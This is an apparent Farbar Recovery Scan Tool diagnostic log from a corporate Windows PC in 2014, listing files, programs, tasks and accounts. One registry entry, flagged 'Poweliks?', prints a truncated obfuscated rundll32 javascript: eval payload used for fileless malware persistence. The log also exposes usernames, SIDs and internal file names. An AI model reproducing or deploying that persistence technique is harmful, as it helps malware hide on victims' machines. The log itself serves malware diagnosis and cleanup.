2014-10-01 13:30 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\cyoakum1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 13:30 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\cyoakum1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-01 12:55 - 2014-10-08 12:56 - 00000876 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-01 12:55 - 2014-10-01 12:55 - 00002778 _____ () C:\Windows\System32\Tasks\CCleanerSkipUAC
2014-10-01 12:55 - 2014-10-01 12:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-01 12:55 - 2014-10-01 12:55 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-01 08:15 - 2014-10-01 08:15 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-29 16:42 - 2014-09-29 16:42 - 00003136 _____ () C:\{3DDBF410-6D95-4233-A758-50EA5258FC89}
2014-09-25 10:17 - 2014-09-25 10:17 - 00041472 _____ () C:\Users\bashburn\Desktop\Copy of Rollins MVRDownload - missing paper form (2).xls
2014-09-24 15:28 - 2014-09-24 15:28 - 03078314 _____ () C:\Users\bashburn\Desktop\MVR Detail Report (09-23-2014) (2).xlsx
2014-09-24 15:27 - 2014-09-24 15:27 - 01895187 _____ () C:\Users\bashburn\Desktop\SCC Export (09-23-14).xlsx
2014-09-18 15:58 - 2014-09-18 15:58 - 00013185 _____ () C:\Users\bashburn\Downloads\Cannon Disciple 3..._[1].Think ON these Things for Lesson 3 September 21, 2014 (2)
2014-09-18 15:57 - 2014-09-18 15:57 - 00013185 _____ () C:\Users\bashburn\Downloads\Cannon Disciple 3..._[1].Think ON these Things for Lesson 3 September 21, 2014 (1)
2014-09-18 15:57 - 2014-09-18 15:57 - 00013185 _____ () C:\Users\bashburn\Downloads\Cannon Disciple 3..._[1].Think ON these Things for Lesson 3 September 21, 2014
2014-09-17 04:14 - 2014-10-06 10:16 - 00000000 ____D () C:\TEMP
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-17 10:12 - 2013-11-27 11:37 - 00000902 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-17 10:11 - 2013-11-19 12:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-17 10:10 - 2014-01-30 13:51 - 00000544 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job
2014-10-17 09:48 - 2013-11-19 10:17 - 00001072 _____ () C:\Windows\system32\config\netlogon.ftl
2014-10-17 08:11 - 2013-11-27 11:37 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-16 16:34 - 2013-12-16 16:20 - 00000000 ____D () C:\Users\bashburn\AppData\Local\CrashDumps
2014-10-16 13:33 - 2013-11-06 10:12 - 01209973 _____ () C:\Windows\WindowsUpdate.log
2014-10-16 10:18 - 2013-11-21 17:00 - 00000000 ____D () C:\Users\bashburn\AppData\Roaming\DameWare Development
2014-10-16 07:18 - 2009-07-13 22:34 - 00000215 _____ () C:\Windows\system.ini
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:13 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-14 17:01 - 2009-07-14 01:13 - 00786014 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-09 13:13 - 2013-11-27 11:38 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-03 10:41 - 2013-07-25 10:24 - 00000000 ____D () C:\Software
2014-10-01 14:46 - 2009-07-14 00:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-01 14:31 - 2013-11-19 12:12 - 00000000 ____D () C:\Users\Administrator
2014-10-01 14:31 - 2009-07-13 23:20 - 00000000 __RHD () C:\Users\Default
2014-10-01 13:20 - 2013-07-17 01:40 - 00000000 ____D () C:\Windows\Panther
2014-09-20 22:01 - 2013-11-19 16:03 - 00001604 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Focus Branch.lnk
2014-09-20 22:01 - 2013-11-19 16:03 - 00000000 ____D () C:\Focus
2014-09-18 17:04 - 2009-07-13 23:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-09-18 09:47 - 2013-11-19 12:18 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-09-17 12:08 - 2013-11-21 17:19 - 00000000 ____D () C:\Users\bashburn\AppData\Local\Deployment
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-16 00:17
 
==================== End Of Log ============================
 
 
 
 
 
 
------------------------------------------------------------------------------ Additional File ---------------------------------------------------------------------------------------------------------
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by bashburn at 2014-10-17 11:01:49
Running from C:\TEMP\Combofix files
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Symantec Endpoint Protection (Disabled - Up to date) {63DF5164-9100-186D-2187-8DC619EFD8BF}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Disabled - Up to date) {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Symantec Endpoint Protection (Disabled) {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 8.2.4 - Hewlett-Packard) Hidden
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.3.300.265 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Altiris Application Metering Agent (x32 Version: 7.5.3219.0 - Symantec Corporation) Hidden
Altiris Deployment Agent (HKLM\...\{6C8D5E56-CA12-42B2-9075-044B4C7067A9}) (Version: 1.0.0 - Altiris)
Altiris Inventory Agent (x32 Version: 7.5.3219.0 - Symantec Corporation) Hidden
BGInfo (HKLM\...\BGInfo) (Version: 2.0 - Rollins,INC)
CA Plex 5.0 Runtimes (HKLM-x32\...\{D7116E20-F02B-4DF3-85F8-B582711E4FCC}) (Version: 1.0.1.0 - Rollins, Inc)
CCleaner (HKLM\...\CCleaner) (Version: 4.15 - Piriform)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
CVE-2012-1889 (HKLM\...\{06b2b7ed-809a-44e6-8538-ca0f5b74ecc4}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{29447369-6968-4e86-a208-603f6f0771a6}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{393ffabe-5a1a-43b3-8e03-8f573e1e0d01}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{7d32ab1f-1858-4373-a75a-b7cd8feb5d92}.sdb) (Version:  - )
CVE-2012-1889 (HKLM\...\{f300e352-12de-4e7f-ace3-a376874402b6}.sdb) (Version:  - )
cwbnethlp (x32 Version: 1.00.0000 - Your Company Name) Hidden
DameWare Mini Remote Control 9.0 (HKLM-x32\...\{75BBC7CB-D307-4B40-BB5C-1BEFC5B40E80}) (Version: 9.0.1.247 - SolarWinds)
DSI HR TruCheck (HKCU\...\9f1c6621dfa8d94f) (Version: 2.0.0.61 - Database Systems International)
Focus 7.2.0 (HKLM-x32\...\{6ED3132B-5BF5-4C82-9BAD-21EC7FAC5F2F}) (Version: 7.2.0 - Rollins, Inc)
Focus Ratecard fix 6.5.0 (HKLM-x32\...\{F17D3220-919E-4836-8C24-599FB587DD1F}) (Version: 1.0.0 - Rollins Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.101 - Google Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
GoToMeeting 6.3.0.1468 (HKCU\...\GoToMeeting) (Version: 6.3.0.1468 - CitrixOnline)
IBM i Access for Windows 7.1 (HKLM\...\{31E11496-1F84-4DCC-B07A-369B40B8B4A7}) (Version: 07.01.0001 - IBM)
IBM i Access for Windows MRI (x32 Version: 07.01.0000 - IBM) Hidden
J2SE Runtime Environment 5.0 Update 17 (HKLM-x32\...\{3248F0A8-6813-11D6-A77B-00B0D0150170}) (Version: 1.5.0.170 - Sun Microsystems, Inc.)
Java™ 6 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216031FF}) (Version: 6.0.310 - Oracle)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee Agent (HKLM-x32\...\{EBF3D65F-011E-44D2-8F4F-C74B52682EDD}) (Version: 4.8.0.1500 - McAfee, Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
MM Client (HKLM-x32\...\{6315D12F-EEB9-4F45-95A1-D543E810A925}) (Version: 9.2.603.000 - Avaya)
Patch Management Agent (Version: 7.5.3219.0 - Symantec) Hidden
Power Scheme Plug-in Setup (Version: 7.5.1597.0 - Altiris) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6543 - Realtek Semiconductor Corp.)
Rollins Common Controls (HKLM-x32\...\{E8928EB9-BCB8-4BCD-A113-9962110B370E}) (Version: 1.0.0.0 - Rollins, Inc)
Snagit 11 (HKLM-x32\...\{7CA5C4DF-8327-4035-AE2B-CA76336A04FD}) (Version: 11.0.0 - TechSmith Corporation)
Software Management Solution Plugin (Version: 7.5.3219.0 - Altiris Inc.) Hidden
SSL VPN 64 (HKLM\...\SSL VPN) (Version: 4.1 - Rollins,INC)
Symantec Endpoint Protection (HKLM\...\{C02FF081-3B1D-47BA-AA68-37D0EA4B75C5}) (Version: 12.1.3001.165 - Symantec Corporation)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{39767ECA-1731-45DB-AB5B-6BF40E151D66}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{48E1B6C2-7299-4F3F-AA63-42F0ACE55AA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553378) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{14B7142F-D7E2-4FB0-9E3B-7CAA8D7FFC56}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687503) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B1FA5E8C-2342-45AF-8A62-5E860042F8DF}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2767886) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9CFD026D-EB1C-48C2-9DD2-8E8875F251B2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837583) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{E21274CE-CA0C-49FA-93F4-DC292A052264}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{B5C70C99-B109-42FD-B219-FF12CA543F19}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{82F87E28-B18E-46D6-A399-E2F19CF5949B}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{5E8EB600-8B94-429E-873E-98369C6DC1BC}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2775360) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{80F56E3F-1D47-4E45-B6E0-FEF4E919F4F9}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2837593) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{E78E2B68-8FD1-42EE-BB74-99A4D9E6222D}) (Version:  - Microsoft)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1468\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
16-10-2014 04:00:01 Scheduled Checkpoint
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {2DF2E46C-5560-474A-82A3-D6289F6D3309} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-27] (Google Inc.)
Task: {47440FA6-AED0-4068-817A-E98D9CBE3116} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-11-19] (Adobe Systems Incorporated)
Task: {8321DADE-FCFA-4289-8D84-C264B7DA0804} - System32\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640 => C:\Program Files (x86)\Citrix\GoToMeeting\1468\g2mupdate.exe [2014-08-13] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {CAF0CE4A-3719-4B4C-96B6-6CE52944B1BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-27] (Google Inc.)
Task: {F40B0A7E-7E7A-47B6-9B7F-33B62CE10010} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-06-24] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job => C:\Program Files (x86)\Citrix\GoToMeeting\1468\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2013-11-19 16:12 - 2014-05-27 08:21 - 00500048 _____ () C:\Program Files\Altiris\Altiris Agent\Agents\SoftwareManagement\AeXWiseRuleProvider.dll
2011-03-17 01:07 - 2011-03-17 01:07 - 04297568 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 16:23 - 2010-10-20 16:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-05-10 10:16 - 2012-05-10 10:16 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-10-03 04:17 - 2012-10-03 09:17 - 01765376 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\LMUD1N4Z.DLL
2013-11-19 12:19 - 1999-04-29 21:05 - 01144320 _____ () C:\ZJDEWV\AW9RT.EXE
2007-04-18 19:30 - 2007-04-18 19:30 - 00393216 _____ () C:\Program Files (x86)\McAfee\Common Framework\cryptocme2.dll
2007-04-18 19:30 - 2007-04-18 19:30 - 00471040 _____ () C:\Program Files (x86)\McAfee\Common Framework\ccme_base.dll
2011-03-17 01:11 - 2011-03-17 01:11 - 04297568 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 16:45 - 2010-10-20 16:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-03-17 01:11 - 2011-03-17 01:11 - 04297568 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2010-12-21 02:15 - 2010-12-21 02:15 - 01041248 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00421376 _____ () C:\ZJDEWV\GF9BASE.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00509440 _____ () C:\ZJDEWV\AW9BG.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00075264 _____ () C:\ZJDEWV\AW9GCC.dll
2013-11-19 12:19 - 1999-04-29 18:51 - 00047104 _____ () C:\ZJDEWV\GF9API.dll
2013-11-19 12:19 - 1999-04-29 21:05 - 00074240 _____ () C:\ZJDEWV\AW9EMU.DLL
2013-11-19 12:19 - 1999-04-29 21:05 - 00013312 _____ () C:\ZJDEWV\AW9TCP.DLL
2013-11-19 12:19 - 1999-04-29 21:05 - 00073216 _____ () C:\ZJDEWV\AW9TA.DLL
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-282504879-2390210712-2269872377-500 - Administrator - Enabled)
Guest (S-1-5-21-282504879-2390210712-2269872377-501 - Limited - Disabled)
netadmin (S-1-5-21-282504879-2390210712-2269872377-1000 - Administrator - Enabled) => C:\Users\netadmin
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
